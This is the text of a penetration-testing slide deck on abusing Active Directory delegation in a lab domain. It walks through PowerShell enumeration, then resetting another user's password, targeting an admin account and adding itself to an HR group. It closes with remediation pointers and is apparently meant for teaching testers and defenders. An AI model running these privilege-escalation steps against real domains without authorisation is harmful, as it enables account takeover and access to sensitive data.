SlideShare ist ein Scribd-Unternehmen logo
1 von 27
Active	Directory	
Delegation
“…Active	Directory	delegation	is	critical	part	of	many	
organisations'	IT	infrastructure.	By	delegating	administration,	
you	can	grant	users	or	groups	only	the	permissions	they	need	
without	adding	users	to	privileged	groups	(e.g.,	Domain	
Admins,	Account	Operators)…”*
*	[source]	http://windowsitpro.com/active-directory/view-remove-ad-delegated-permissions
AD	Dele-What?
Requirements
• Windows	Remote	Administration	Toolkit
https://www.microsoft.com/en-gb/download/details.aspx?id=45520
• Windows	attacking	host	with	Admin	Privileges
• Patience	and	Enumeration	Skills!
AD	PowerShell	Cmdlets
• Import	the	AD	PowerShell	module	on	the	attacking	host
• The	attack	box	isn’t	part	of	the	victim	domain,	so	the	AD	drive	cannot	load
$Env:ADPS_LoadDefaultDrive = 0
Import-Module ActiveDirectory
LDAP	Overview
Terminology
• CN = Common Name
• OU = Organizational Unit
• DC = Domain Component
CN=bob,OU=Support,OU=Users,OU=Cambridge,OU=UK,OU=Offices,DC
=rebootuser,DC=local
Exercise
We	(most	likely)	need:
• User	credentials	of	some	sort…
Questions	to	ask:
• What’s	the	Domain	name	/	Distinguished	Name	(DN)?
Enumeration
Get-ADDomain -Server 192.168.99.100 -Credential "rebootuserbob”
Redacted	Output:
DistinguishedName : DC=rebootuser,DC=local
DNSRoot : rebootuser.local
DomainMode : Windows2012Domain
DomainSID : S-1-5-21-3305272636-1761470839-3168806703
Forest : rebootuser.local
InfrastructureMaster : DC-01.rebootuser.local:
NetBIOSName : REBOOTUSER
PDCEmulator : DC-01.rebootuser.local
RIDMaster : DC-01.rebootuser.local
SystemsContainer : CN=System,DC=rebootuser,DC=local
UsersContainer : CN=Users,DC=rebootuser,DC=local
Exercise	
We	have	access	to	bob’s	account
Questions	to	ask:
• Where	does	bob's	account	reside?
• Anything	‘interesting’	leaked	from	his	account	info?
Account	Enumeration
Get-ADUser -Identity "bob" -server 192.168.99.100 -Credential
"rebootuserbob" -properties *
Redacted	Output:
DistinguishedName :
CN=bob,OU=Support,OU=Users,OU=Cambridge,OU=UK,OU=Offices,DC=rebootuser,DC=l
ocal
Description : 1st Line Support
HomeDirectory : DC-01Share$HomeBob
Exercise	
Questions	to	ask	:
• How	is	the	LDAP	environment	structured?
• Where	do	user	accounts	reside?
Enumeration	is	Slow….
$username = "rebootuserbob"
$password = ConvertTo-SecureString "P@ssw0rd!" -AsPlainText -Force
$cred = new-object -typename System.Management.Automation.PSCredential -
argumentlist $username, $password
$diname = Get-ADOrganizationalUnit -Filter * -SearchBase
"dc=rebootuser,dc=local" -Properties canonicalname -server 192.168.99.100 -
Credential $cred | select distinguishedname; foreach ($i in $diname)
{write-output $i.distinguishedname; Get-ADUser -SearchBase
$i.distinguishedname -Filter * -Searchscope onelevel -server 192.168.99.100
-Credential $cred | Format-List SamAccountName}
Enumeration	is	Slow….
OU=Sales,OU=Users,OU=Cambridge,OU=UK,OU=Offices,DC=rebootuser,DC=local
SamAccountName : sue
OU=Support,OU=Users,OU=Cambridge,OU=UK,OU=Offices,DC=rebootuser,DC=local
SamAccountName : bob
SamAccountName : jeff
OU=Management,OU=Users,OU=London,OU=UK,OU=Offices,DC=rebootuser,DC=local
SamAccountName : tim
OU=Marketing,OU=Users,OU=London,OU=UK,OU=Offices,DC=rebootuser,DC=local
SamAccountName : jimmy
OU=IT,OU=Users,OU=NY,OU=USA,OU=Offices,DC=rebootuser,DC=local
SamAccountName : godmode
OU=HR,OU=Users,OU=NY,OU=USA,OU=Offices,DC=rebootuser,DC=local
SamAccountName : sally
Exercise	
We’ve	identified	a	number	of	custom	OU’s
Questions	to	ask	:
• Do	any	users/groups	hold	delegation	rights	over	any	
OU’s	within	the	environment?
Introducing	ACL	Scanner
• https://adaclscan.codeplex.com/
• OU=Support,OU=Users,OU=Cambridge,OU=UK,OU=Offices,DC=rebootuser,DC=local
Exercise	
We’ve	identified	2	groups:	
• it_support_limited (some	delegated	rights)	and
• it_support_priv (many	delegated	rights)
Questions	to	ask	:
• Users	that	have	membership	of	either	group
Group	Memberships
Get-ADGroupMember -Identity "it_support_limited" -server 192.168.99.100 -
Credential "rebootuserbob" | select ObjectClass, SamAccountName
Get-ADGroupMember -Identity "it_support_priv" -server 192.168.99.100 -
Credential "rebootuserbob" | select ObjectClass, SamAccountName
Exercise	
OK,	Bob (a	member	of	“it_support_limited”)	has	the	reset	
password	right	over	the	Support	OU
Questions	to	ask	:
• Where	does	Jeff’s	(or	any	other	‘useful’)	account	reside?
Abuse	of	Privilege…
• Looking	at	the	previous	enumeration	results	we	see	that	Jeff	is	also	in	the	support	OU
OU=Support,OU=Users,OU=Cambridge,OU=UK,OU=Offices,DC=rebootuser,DC=local
SamAccountName : bob
SamAccountName : jeff
• Let's	change	his	password!
Set-ADAccountPassword
'cn=jeff,ou=support,ou=users,ou=cambridge,ou=uk,ou=offices,dc=rebootuser,dc
=local' -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "P@ssw0rd"
-Force) -Server 192.168.99.100 -Credential "rebootuserbob"
To	cut	a	long	story	(and	many,	many	more	slides	of	enumeration)	IT_support_limited has	password	reset	
rights	over	the	UK	OU	and	child	entities	and	IT_support_priv has	all	possible	delegation	rights	over	the	entire	
Offices	OU and	child	entities
Exercise	
Now	we’ve	inherited	Jeff’s	powerful	delegation	rights	over	
the	entire	Offices	OU	and	sub	entities!	
Questions	to	ask	:
• Are	there	any	privileged	accounts	we	can	commandeer?
PWN	all	the	Admins!
• From	earlier	recon	we	found	an	interesting	user,	godmode:
OU=IT,OU=Users,OU=NY,OU=USA,OU=Offices,DC=rebootuser,DC=local
• Which	groups	is	godmode a	member:
Get-ADPrincipalGroupMembership godmode -Server 192.168.99.100 -Credential
"rebootuserjeff" | select name
• Ah,	excellent	Jeff	has	delegation	rights	here,	lets	change	the	password….
AdminSDHolder &	SDProp
• AdminSDHolder is	a container	that	exists	in	
each	AD	domain
• A	protected	group	is	an	Active	Directory	group	
that	is	identified	as	a	privileged	group.	This	
group	and	all	its	members	should	be	protected	
from	unintentional	modifications*
• When	an	AD	group	is	marked	a	protected	
group;	AD	will	ensure	that	the	owner,	the	ACLs	
and	the	inheritance	applied	on	this	group	are	
the	same	as	the	ones	applied	on	
AdminSDHolder container*
*	[source]	https://social.technet.microsoft.com/wiki/contents/articles/22331.adminsdholder-protected-groups-and-security-descriptor-propagator.aspx
AdminSDHolder – Who/What/Eh?
Get-ADGroup -LDAPFilter "(admincount=1)"	-Server	192.168.99.100	-Credential	"rebootuserjeff"	|	Select	
SamAccountName
Get-ADUser -LDAPFilter "(admincount=1)"	-Server	192.168.99.100	-Credential	"rebootuserjeff"		|	Select	
SamAccountName
Needing	Direction
• So	where	do	we	go	from	here?
• We	have	powerful	delegation	rights	– we	can	change	passwords,	modify	group	memberships,	add	
groups/user	etc.
• DA	is	not	necessarily	the	end	goal
• Sensitive	data	is	likely	to	be	stored	in	group	drives:
• If	we	recall,	Bobs	home	directory	resides	in	the	following	location:
HomeDirectory : DC-01Share$HomeBob
• HR
• Finance
• IT
• Management
• …the	list	goes	on
Exercise	
There	are	many	directions	we	could	take…
Questions	to	ask	:
• DA	is	off	the	table	(for	now),	but	are	there	any	other	
sensitive	groups	we	can	pwn?
Group	Enumeration
• Automated	group	enumeration	– I	won’t	bore	you	with	the	PS	query!
OU=IT,OU=Users,OU=NY,OU=USA,OU=Offices,DC=rebootuser,DC=local
SamAccountName : IT_support_limited
SamAccountName : IT_support_priv
SamAccountName : it_users
SamAccountName : the_privileged_few
OU=HR,OU=Users,OU=NY,OU=USA,OU=Offices,DC=rebootuser,DC=local
SamAccountName : hr_users
• We	(Jeff)	have	delegation	rights	here	- let's	add	ourselves	(bob)	to	this	group!
Delegation	Disaster!
DEMO
Final	Thoughts
• Complex	environments	could	easily	faultier	in	delegation	assignments
• Microsoft	provide	a	nice	wizard	interface	for	assigning	permissions…
….revoking	permissions	is	not	such	a	straight	forward	approach
• Often	overlooked	in	pentests,	but	a	prime	target!
• Dsrevoke
• PowerShell
• ADUC	>	Advanced	View	>	Security	Tab

Weitere ähnliche Inhalte

Was ist angesagt?

Access Data from XPages with the Relational Controls
Access Data from XPages with the Relational ControlsAccess Data from XPages with the Relational Controls
Access Data from XPages with the Relational ControlsTeamstudio
 
Kevin Schmidt - Uploading Files in Flex
Kevin Schmidt - Uploading Files in FlexKevin Schmidt - Uploading Files in Flex
Kevin Schmidt - Uploading Files in Flex360|Conferences
 
SenchaCon 2016: A Look Ahead: Survey Next-Gen Modern Browser APIs - Shikhir S...
SenchaCon 2016: A Look Ahead: Survey Next-Gen Modern Browser APIs - Shikhir S...SenchaCon 2016: A Look Ahead: Survey Next-Gen Modern Browser APIs - Shikhir S...
SenchaCon 2016: A Look Ahead: Survey Next-Gen Modern Browser APIs - Shikhir S...Sencha
 
Managing Infrastructure as Code
Managing Infrastructure as CodeManaging Infrastructure as Code
Managing Infrastructure as CodeAllan Shone
 
Which cloud provider for your oracle database
Which cloud provider for your oracle databaseWhich cloud provider for your oracle database
Which cloud provider for your oracle databaseLaurent Leturgez
 
Under the Wire PowerShell workshop - BSides Augusta 2018
Under the Wire PowerShell workshop - BSides Augusta 2018Under the Wire PowerShell workshop - BSides Augusta 2018
Under the Wire PowerShell workshop - BSides Augusta 2018Fernando Tomlinson, CISSP, MBA
 
2-5-14 “DSpace User Interface Innovation” Presentation Slides
2-5-14 “DSpace User Interface Innovation” Presentation Slides2-5-14 “DSpace User Interface Innovation” Presentation Slides
2-5-14 “DSpace User Interface Innovation” Presentation SlidesDuraSpace
 
DSpace 4.2 Basics & Configuration
DSpace 4.2 Basics & ConfigurationDSpace 4.2 Basics & Configuration
DSpace 4.2 Basics & ConfigurationDuraSpace
 

Was ist angesagt? (12)

Access Data from XPages with the Relational Controls
Access Data from XPages with the Relational ControlsAccess Data from XPages with the Relational Controls
Access Data from XPages with the Relational Controls
 
Kevin Schmidt - Uploading Files in Flex
Kevin Schmidt - Uploading Files in FlexKevin Schmidt - Uploading Files in Flex
Kevin Schmidt - Uploading Files in Flex
 
SenchaCon 2016: A Look Ahead: Survey Next-Gen Modern Browser APIs - Shikhir S...
SenchaCon 2016: A Look Ahead: Survey Next-Gen Modern Browser APIs - Shikhir S...SenchaCon 2016: A Look Ahead: Survey Next-Gen Modern Browser APIs - Shikhir S...
SenchaCon 2016: A Look Ahead: Survey Next-Gen Modern Browser APIs - Shikhir S...
 
Managing Infrastructure as Code
Managing Infrastructure as CodeManaging Infrastructure as Code
Managing Infrastructure as Code
 
60 Admin Tips
60 Admin Tips60 Admin Tips
60 Admin Tips
 
Selenium testing - Handle Elements in WebDriver
Selenium testing - Handle Elements in WebDriver Selenium testing - Handle Elements in WebDriver
Selenium testing - Handle Elements in WebDriver
 
Which cloud provider for your oracle database
Which cloud provider for your oracle databaseWhich cloud provider for your oracle database
Which cloud provider for your oracle database
 
Under the Wire PowerShell workshop - BSides Augusta 2018
Under the Wire PowerShell workshop - BSides Augusta 2018Under the Wire PowerShell workshop - BSides Augusta 2018
Under the Wire PowerShell workshop - BSides Augusta 2018
 
Introduction to Monsoon PHP framework
Introduction to Monsoon PHP frameworkIntroduction to Monsoon PHP framework
Introduction to Monsoon PHP framework
 
2-5-14 “DSpace User Interface Innovation” Presentation Slides
2-5-14 “DSpace User Interface Innovation” Presentation Slides2-5-14 “DSpace User Interface Innovation” Presentation Slides
2-5-14 “DSpace User Interface Innovation” Presentation Slides
 
Curious Case of SQLi
Curious Case of SQLiCurious Case of SQLi
Curious Case of SQLi
 
DSpace 4.2 Basics & Configuration
DSpace 4.2 Basics & ConfigurationDSpace 4.2 Basics & Configuration
DSpace 4.2 Basics & Configuration
 

Ähnlich wie Active Directory Delegation - By @rebootuser

DC/OS: Datacenter Operating System
DC/OS: Datacenter Operating SystemDC/OS: Datacenter Operating System
DC/OS: Datacenter Operating SystemKnoldus Inc.
 
Material modulo02 asf6501(6425-b_01)
Material   modulo02 asf6501(6425-b_01)Material   modulo02 asf6501(6425-b_01)
Material modulo02 asf6501(6425-b_01)JSantanderQ
 
AD Basic and Azure AD.pptx
AD Basic and Azure AD.pptxAD Basic and Azure AD.pptx
AD Basic and Azure AD.pptxSumTingWong8
 
Centralizing users’ authentication at Active Directory level 
Centralizing users’ authentication at Active Directory level Centralizing users’ authentication at Active Directory level 
Centralizing users’ authentication at Active Directory level Hossein Sarshar
 
Cause 2013: A Flexible Approach to Creating an Enterprise Directory
Cause 2013: A Flexible Approach to Creating an Enterprise DirectoryCause 2013: A Flexible Approach to Creating an Enterprise Directory
Cause 2013: A Flexible Approach to Creating an Enterprise Directoryrwgorrel
 
DBA Tasks in Oracle Autonomous Database
DBA Tasks in Oracle Autonomous DatabaseDBA Tasks in Oracle Autonomous Database
DBA Tasks in Oracle Autonomous DatabaseSinanPetrusToma
 
Windows Server 2012 Managing Active Directory Domain
Windows Server 2012 Managing  Active Directory DomainWindows Server 2012 Managing  Active Directory Domain
Windows Server 2012 Managing Active Directory DomainNapoleon NV
 
Identity Management for Office 365 and Microsoft Azure
Identity Management for Office 365 and Microsoft AzureIdentity Management for Office 365 and Microsoft Azure
Identity Management for Office 365 and Microsoft AzureSparkhound Inc.
 
O365-AzureAD Identity management
O365-AzureAD Identity managementO365-AzureAD Identity management
O365-AzureAD Identity managementDavid Pechon
 
Microsoft Azure Kimlik Yönetimi
Microsoft Azure Kimlik YönetimiMicrosoft Azure Kimlik Yönetimi
Microsoft Azure Kimlik YönetimiÖnder Değer
 
Scoping for BMC Discovery (ADDM) Deployment by Traversys Limited
Scoping for BMC Discovery (ADDM) Deployment by Traversys LimitedScoping for BMC Discovery (ADDM) Deployment by Traversys Limited
Scoping for BMC Discovery (ADDM) Deployment by Traversys LimitedWes Moskal-Fitzpatrick
 
ADManager Plus Active Directory Management & Reporting
ADManager Plus Active Directory Management & ReportingADManager Plus Active Directory Management & Reporting
ADManager Plus Active Directory Management & ReportingPhuongTam6
 
Azure from scratch part 2 By Girish Kalamati
Azure from scratch part 2 By Girish KalamatiAzure from scratch part 2 By Girish Kalamati
Azure from scratch part 2 By Girish KalamatiGirish Kalamati
 
Configuring and Troubleshooting XenDesktop Sites
Configuring and Troubleshooting XenDesktop SitesConfiguring and Troubleshooting XenDesktop Sites
Configuring and Troubleshooting XenDesktop SitesDavid McGeough
 
Architecting your Frontend
Architecting your FrontendArchitecting your Frontend
Architecting your FrontendRuben Teijeiro
 
Microsoft SQL Azure - Building Applications Using SQL Azure Presentation
Microsoft SQL Azure - Building Applications Using SQL Azure PresentationMicrosoft SQL Azure - Building Applications Using SQL Azure Presentation
Microsoft SQL Azure - Building Applications Using SQL Azure PresentationMicrosoft Private Cloud
 

Ähnlich wie Active Directory Delegation - By @rebootuser (20)

Ad ds ws2008 r2
Ad ds ws2008 r2Ad ds ws2008 r2
Ad ds ws2008 r2
 
DC/OS: Datacenter Operating System
DC/OS: Datacenter Operating SystemDC/OS: Datacenter Operating System
DC/OS: Datacenter Operating System
 
Material modulo02 asf6501(6425-b_01)
Material   modulo02 asf6501(6425-b_01)Material   modulo02 asf6501(6425-b_01)
Material modulo02 asf6501(6425-b_01)
 
AD Basic and Azure AD.pptx
AD Basic and Azure AD.pptxAD Basic and Azure AD.pptx
AD Basic and Azure AD.pptx
 
Centralizing users’ authentication at Active Directory level 
Centralizing users’ authentication at Active Directory level Centralizing users’ authentication at Active Directory level 
Centralizing users’ authentication at Active Directory level 
 
Cause 2013: A Flexible Approach to Creating an Enterprise Directory
Cause 2013: A Flexible Approach to Creating an Enterprise DirectoryCause 2013: A Flexible Approach to Creating an Enterprise Directory
Cause 2013: A Flexible Approach to Creating an Enterprise Directory
 
DBA Tasks in Oracle Autonomous Database
DBA Tasks in Oracle Autonomous DatabaseDBA Tasks in Oracle Autonomous Database
DBA Tasks in Oracle Autonomous Database
 
Final domain control policy
Final domain control policy  Final domain control policy
Final domain control policy
 
Windows Server 2012 Managing Active Directory Domain
Windows Server 2012 Managing  Active Directory DomainWindows Server 2012 Managing  Active Directory Domain
Windows Server 2012 Managing Active Directory Domain
 
Active Directory
Active DirectoryActive Directory
Active Directory
 
Identity Management for Office 365 and Microsoft Azure
Identity Management for Office 365 and Microsoft AzureIdentity Management for Office 365 and Microsoft Azure
Identity Management for Office 365 and Microsoft Azure
 
O365-AzureAD Identity management
O365-AzureAD Identity managementO365-AzureAD Identity management
O365-AzureAD Identity management
 
Microsoft Azure Kimlik Yönetimi
Microsoft Azure Kimlik YönetimiMicrosoft Azure Kimlik Yönetimi
Microsoft Azure Kimlik Yönetimi
 
Scoping for BMC Discovery (ADDM) Deployment by Traversys Limited
Scoping for BMC Discovery (ADDM) Deployment by Traversys LimitedScoping for BMC Discovery (ADDM) Deployment by Traversys Limited
Scoping for BMC Discovery (ADDM) Deployment by Traversys Limited
 
Chapter Two.pptx
Chapter Two.pptxChapter Two.pptx
Chapter Two.pptx
 
ADManager Plus Active Directory Management & Reporting
ADManager Plus Active Directory Management & ReportingADManager Plus Active Directory Management & Reporting
ADManager Plus Active Directory Management & Reporting
 
Azure from scratch part 2 By Girish Kalamati
Azure from scratch part 2 By Girish KalamatiAzure from scratch part 2 By Girish Kalamati
Azure from scratch part 2 By Girish Kalamati
 
Configuring and Troubleshooting XenDesktop Sites
Configuring and Troubleshooting XenDesktop SitesConfiguring and Troubleshooting XenDesktop Sites
Configuring and Troubleshooting XenDesktop Sites
 
Architecting your Frontend
Architecting your FrontendArchitecting your Frontend
Architecting your Frontend
 
Microsoft SQL Azure - Building Applications Using SQL Azure Presentation
Microsoft SQL Azure - Building Applications Using SQL Azure PresentationMicrosoft SQL Azure - Building Applications Using SQL Azure Presentation
Microsoft SQL Azure - Building Applications Using SQL Azure Presentation
 

Kürzlich hochgeladen

From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilV3cube
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobeapidays
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 

Kürzlich hochgeladen (20)

From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of Brazil
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 

Active Directory Delegation - By @rebootuser